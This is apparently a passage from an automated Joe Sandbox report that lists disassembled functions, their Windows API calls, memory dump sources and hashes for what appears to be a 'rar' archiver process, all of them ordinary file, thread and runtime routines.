                                                                                                                                                                      • Instruction ID: 72c3a29925a5577a28ee7e381ca53e8fea727581eb1ee6f0620bb6b236253ca6
                                                                                                                                                                      • Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5341B123B18A4182EB609F25E4447B977A1FBA8794F464031EE8D87788DFBED411C709
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE78D7BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2280078643-1018135373
                                                                                                                                                                      • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                      • Instruction ID: 784846237b95f337af4ffb9bc26c2bc46549e71ab553b52fc6ed9638a57b0f6c
                                                                                                                                                                      • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                      • Instruction Fuzzy Hash: FA213C7B60865182EB309B11E04026EB761F7A4BA5F011235EF9D43B95CF7DE891CB0A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77B780 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                      • String ID: Thread pool initialization failed.
                                                                                                                                                                      • API String ID: 3340455307-2182114853
                                                                                                                                                                      • Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                      • Instruction ID: 3055821a0be874b65ff8a096b81e88ecaf7228ec99ff7136bfe64273b0830552
                                                                                                                                                                      • Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                      • Instruction Fuzzy Hash: FE11E733B0564182FB008F21E4043A932E2EBE4B45F098435D64D4B699CFBED466C745
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE782984 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 904936192-0
                                                                                                                                                                      • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                      • Instruction ID: 159f841514cd39d68232da6fdd3df6c44f8889a5df0ccb08ca6eb86679eb9235
                                                                                                                                                                      • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                      • Instruction Fuzzy Hash: D551F363A19AC181EF50CF25D4503AC73A1FBA4B94F058231EE5E87794DFBAD121C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE753818 Relevance: 6.1, APIs: 4, Instructions: 129filetimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF6EE74F6FC,00000000,?,?,?,?,00007FF6EE75097D), ref: 00007FF6EE7538CD
                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,?,?,00007FF6EE74F6FC,00000000,?,?,?,?,00007FF6EE75097D,?,?,00000000), ref: 00007FF6EE75391F
                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00007FF6EE74F6FC,00000000,?,?,?,?,00007FF6EE75097D,?,?,00000000), ref: 00007FF6EE75399B
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00007FF6EE74F6FC,00000000,?,?,?,?,00007FF6EE75097D,?,?,00000000), ref: 00007FF6EE7539A6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Create$CloseHandleTime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2287278272-0
                                                                                                                                                                      • Opcode ID: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                                                                                                                                      • Instruction ID: 6f25af175b1ada1e430675a4340111184c4dffc172a13190fc7e2652262c8433
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                                                                                                                                      • Instruction Fuzzy Hash: DB41F363A0C64152EF508B11E41037A66A1BBA5BA8F124231FE9C877E8DFBED459C706
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE795120 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4141327611-0
                                                                                                                                                                      • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                      • Instruction ID: 900f40c2ba265a35eeb02f7a33fd468adcd1f3b24e015dd8510758856237f13f
                                                                                                                                                                      • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                      • Instruction Fuzzy Hash: 79419363A1DB9246FF618A50D040379A2A1AF60B90F174131FA4C86AD9DFBFE461C71A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE74D048 Relevance: 6.1, APIs: 4, Instructions: 77fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,00007FF6EE7386CB,?,?,?,00007FF6EE73A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6EE732DF9), ref: 00007FF6EE74D09D
                                                                                                                                                                      • CreateFileW.KERNEL32(?,00007FF6EE7386CB,?,?,?,00007FF6EE73A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6EE732DF9), ref: 00007FF6EE74D0E5
                                                                                                                                                                      • CreateFileW.KERNEL32(?,00007FF6EE7386CB,?,?,?,00007FF6EE73A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6EE732DF9), ref: 00007FF6EE74D114
                                                                                                                                                                      • CreateFileW.KERNEL32(?,00007FF6EE7386CB,?,?,?,00007FF6EE73A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6EE732DF9), ref: 00007FF6EE74D15C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                      • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                      • Instruction ID: 0bab0daaa30507c4b56e2b0d26666070a9fecb236e2b89ccfef81a9cdab48577
                                                                                                                                                                      • Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                      • Instruction Fuzzy Hash: B7319232618B4542EB608F11F55476A77A0F799BA8F514325EAAC43BC8CF7DD044CB05
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE79978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6EE793CEF,?,?,00000000,00007FF6EE793CAA,?,?,00000000,00007FF6EE793FD9), ref: 00007FF6EE7997A5
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6EE793CEF,?,?,00000000,00007FF6EE793CAA,?,?,00000000,00007FF6EE793FD9), ref: 00007FF6EE799807
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6EE793CEF,?,?,00000000,00007FF6EE793CAA,?,?,00000000,00007FF6EE793FD9), ref: 00007FF6EE799841
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6EE793CEF,?,?,00000000,00007FF6EE793CAA,?,?,00000000,00007FF6EE793FD9), ref: 00007FF6EE79986B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1557788787-0
                                                                                                                                                                      • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                      • Instruction ID: f709fa76138c355a0bd770d5ce9d52c0f28ceac6500c2700f8732c9e9ae6bf53
                                                                                                                                                                      • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                      • Instruction Fuzzy Hash: 55218832E1875181EB208F12E44022966A4FF68FD0F0A4139EE4DA7BD8DF7ED861C309
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77B4EC Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentPriorityThread$ClassProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1171435874-0
                                                                                                                                                                      • Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                      • Instruction ID: 9063dae6a3ffdef892b3a76d0cdaba80333977a596f46451fdc2068ec6bf0475
                                                                                                                                                                      • Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                      • Instruction Fuzzy Hash: E5117333A2864287EF508710D48437C2652EBA4741F220434E70D876C4EFBEB865D70A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE795630 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$abort
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1447195878-0
                                                                                                                                                                      • Opcode ID: d4ad33f7b583c9827c365d3e4a5a8ce69c30b5c763285f1b20db24e5820a7030
                                                                                                                                                                      • Instruction ID: aac2713fb28ffb717d9d35cdcfe15d97383debe24b5ee16d97c1d61a82065488
                                                                                                                                                                      • Opcode Fuzzy Hash: d4ad33f7b583c9827c365d3e4a5a8ce69c30b5c763285f1b20db24e5820a7030
                                                                                                                                                                      • Instruction Fuzzy Hash: C901C422F0D75202FF58A330E15533811914F68B80F030538F91E867DAEDAFE461C61A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77B850 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 502429940-0
                                                                                                                                                                      • Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                      • Instruction ID: eec3a417385e5acabc125f9c9630eaf3aa10365c6e14817045af7af5387c24d7
                                                                                                                                                                      • Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                      • Instruction Fuzzy Hash: B6118233614A41D7EB149B20E54476AA331FB967A1F000231EBAD532E5CF7AE475C749
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

